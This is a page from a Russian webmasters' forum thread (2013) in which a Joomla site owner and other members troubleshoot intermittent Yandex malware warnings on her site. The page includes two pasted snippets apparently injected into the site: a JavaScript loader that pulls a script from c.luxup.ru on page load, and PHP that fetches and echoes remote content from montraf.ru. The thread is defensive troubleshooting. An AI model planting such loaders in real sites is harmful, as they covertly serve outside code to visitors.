WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
09 Декабрь 2016, 13:36:15 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама

5
10
15
Свежие ответы
Re: Проблема с дизайнером от Mara (Дизайн)
Re: Предлагаю нескучные статьи от Ljuljak (Контент, копирайтинг, переводы)
Re: Марафон Спарта от Пузата - Почему я иду от Клим (Обучение сайтостроению, SEO и заработку)
Re: Требуется помощница по ведению сайта (контент-менеджер) от Клим (Работа и услуги)
Re: DreamCash.tl - заработок на онлайн-видео. До 95% отчислений, отличный конверт! от DreamSupport (Реклама и доход)
Re: Апа не будет до конца лета? от larisay (Yandex)
Re: Хостинг FairyHosting.com от vladislavd (Хостинг)
Re: как сейчас с высококонкурентной тематикой для новых сайтов? от Ивица (Раскрутка сайтов в поисковиках)
Re: [Анонс] Букварикс: бесплатная программа для быстрого подбора ключевых слов от Bukvarix (Сервисы и SEO программы)
Re: Занимательные статьи для ваших сайтов от Лизки от Chaffinch (Ищу копирайтера, редактора, контент-менеджера)
Re: Авангард блогосферы — электронный журнал о блогосфере от jansen (Наше творчество)
Re: Как найти время заняться своими сайтами? от Natulkin (Мотивация)
Re: Качественные площадки под статьи с высокой посещаемостью и переходами по ссылкам от Igor_Molodtsov (Платное размещение статей и ссылок)
Доска объявлений версии 2.2 от Diana101 (Сайты)
Re: Подарю, продам или сдам в аренду домены от June (Домены)
Свежие темы
Показать ещё
  Печать  
Страниц: 1 2 3 4
Автор

Тема: Вирус то появляется, то исчезает  (Прочитано 3126 раз)

koshka1928
Всё в моих руках...а что не в моих руках, то у моих ног.

Просмотр профиля WWW
« : 20 Декабрь 2013, 09:38:44 »

Не могу понять, что происходит на сайте  Обеспокоенный
Каждый раз Яндекс сообщает мне разные вещи - при одной проверке он обнаруживает на сайте вирус, при другой говорит, что он исчез. Потом снова ВИРУС, в следующую проверку его нет  Непонимающий
Что это такое???
На сайте только реклама от Яндекс-Директа и тизерки по обмену от бэбиклик.
Может ли Я видеть угрозу в тизерках?
Как можно найти и убрать вредоносный код?
Меня это уже порядком достало, если честно  Злой 

J77
И создал Бог женщину. Существо получилось вредное, но забавное...

Просмотр профиля
« Ответ #1 : 20 Декабрь 2013, 09:45:49 »

А что голову ломать, напишите в ТП Яндекса и попросите указать код, который они считают вредоносным. Тогда уже будет понятно, но что грешить.
Ну вообще мне при входе на ваш сайт показывает окошко "Вредоносно ПО"

Краткий план на 2015-16 год: Родить, заработать, переехать.....
Я очень быстро составляю СЯ . А вы?
koshka1928

Просмотр профиля WWW
« Ответ #2 : 20 Декабрь 2013, 10:03:10 »

Ага, в этот раз снова что-то нашел  Обеспокоенный
J77, не подскажете, на какой адрес им писать?

Taya

Просмотр профиля
« Ответ #3 : 20 Декабрь 2013, 10:46:01 »

В Янжекс-вебмастере справа есть раздел "Задать вопрос о сайте службе поддержки", пишите туда, вам пришлют фрагмент кода или описание ситуации, на которую ругается их проверка.
Среди причин (когда вирус то появляется, то исчезает) вполне может быть дырявая защита от вирусов на хостинге (я с таким один раз столкнулась).
Sunjulia

C днем Победы!

Просмотр профиля
« Ответ #4 : 20 Декабрь 2013, 12:10:37 »

Шелл надо искать.

Уважаемые деньги! Приглашаю вас на ПМЖ в мой кошелек. Он очень просторный и удобный, вам понравится. Можете пригласить своих братьев и сестер из Европы и Америки, места хватит всем!
J77
И создал Бог женщину. Существо получилось вредное, но забавное...

Просмотр профиля
« Ответ #5 : 20 Декабрь 2013, 12:21:47 »

Шелл надо искать.
Если через шелл залили, то он исчезать не будет сам по себе. Вот если она бы удаляла его, а потом он снова появлялся, тогда да. Но она ничего не предпринимает, я так понимаю, что он сам по себе то появляется, то исчезает.

Краткий план на 2015-16 год: Родить, заработать, переехать.....
Я очень быстро составляю СЯ . А вы?
Sunjulia

C днем Победы!

Просмотр профиля
« Ответ #6 : 20 Декабрь 2013, 13:30:43 »

Надо что-то искать. Какой-то вирус, но он где-то в файлах сидит. Я не верю в глюки Касперского, Яндекса и т.д. Если вирус появился, значит, он в файлах сайта.

Яндекс вот на чего ругается _http://help.yandex.ru/webmaster/security/verdicts.xml#h1127796
Если я не ошибаюсь. Как бы не картиночный вирус.
А Касперский ругается на вредоносную ссылку. Может и тизерка. Надо ее удалить, а потом Каспером проверить.
« Последнее редактирование: 20 Декабрь 2013, 13:39:12 от Sunjulia » Записан

Уважаемые деньги! Приглашаю вас на ПМЖ в мой кошелек. Он очень просторный и удобный, вам понравится. Можете пригласить своих братьев и сестер из Европы и Америки, места хватит всем!
koshka1928

Просмотр профиля WWW
« Ответ #7 : 20 Декабрь 2013, 14:00:06 »

Однажды я просто удалила все тизерки и партнерки, с которыми сотрудничала примерно на месяц. Весь этот месяц Яндекс мне ничего не сообщал. Потом поставила бэбиклик. Через некторе время разместила баннер тренингового центра "Твой Старт" и на следующий день после размещения мне пришло сообщение. Баннер был тут же удален. Бэбиклик стоит.
У кого-нибудь он стоит еще?
На хостинге у меня 3 сайта и только один из них подвергается "нападению". Может и правда дело в тизерках? Буду сейчас писать Яндексу

Sunjulia

C днем Победы!

Просмотр профиля
« Ответ #8 : 20 Декабрь 2013, 14:05:24 »

На хостинге у меня 3 сайта и только один из них подвергается "нападению". Может и правда дело в тизерках? Буду сейчас писать Яндексу
Ты не горячись Яндекс письмами заваливать  Подмигивающий Убери бэбиклик, давай Касперским проверим? Я здесь пока.

koshka1928

Просмотр профиля WWW
« Ответ #9 : 20 Декабрь 2013, 14:15:21 »

Отключила модуль с тизерами. Проверь  Улыбка

Sunjulia

C днем Победы!

Просмотр профиля
« Ответ #10 : 20 Декабрь 2013, 14:17:16 »

Отключила модуль с тизерами. Проверь  Улыбка
Не оно. Проверь код в index.php шаблона, может лишнее что есть?

Если у тебя мозилла, покликай правой клавишей на картинки, последний пункт - исследовать элемент, вот там еще посмотри, нет ли кода постороннего. И в шапке сайта тоже самое.
В папке images на хостинге глянь, нету ли php файлов.
У тебя движок джумла, как и был?
« Последнее редактирование: 20 Декабрь 2013, 14:20:40 от Sunjulia » Записан

koshka1928

Просмотр профиля WWW
« Ответ #11 : 20 Декабрь 2013, 14:27:53 »

Вот, что нашла:

1. <script type="text/javascript">(function(){var j=81338,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("src","http://c.luxup.ru/t/lb"+j+".js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script>

2. <?php
$urlpurs="http://montraf.ru/8308/take.html";
$beecode=@file_get_contents ($urlpurs);
echo "$beecode";
?>

Вроде, только эти подозрительные

koshka1928

Просмотр профиля WWW
« Ответ #12 : 20 Декабрь 2013, 14:30:08 »

Да, джумла, куда ж ее деть))

Sunjulia

C днем Победы!

Просмотр профиля
« Ответ #13 : 20 Декабрь 2013, 14:38:07 »

У тебя люксап стоит сейчас партнерка? Может ты этот код просто убрать забыла ранее?

koshka1928

Просмотр профиля WWW
« Ответ #14 : 20 Декабрь 2013, 14:41:01 »

Она и не стояла у меня никогда  Непонимающий По краней мере, не помню, чтобы я ее ставила на сайт  Непонимающий
Сейчас до сих пор Каспер сигналит?

Страниц: 1 2 3 4
  Печать  

Перейти в:  

| Sitemap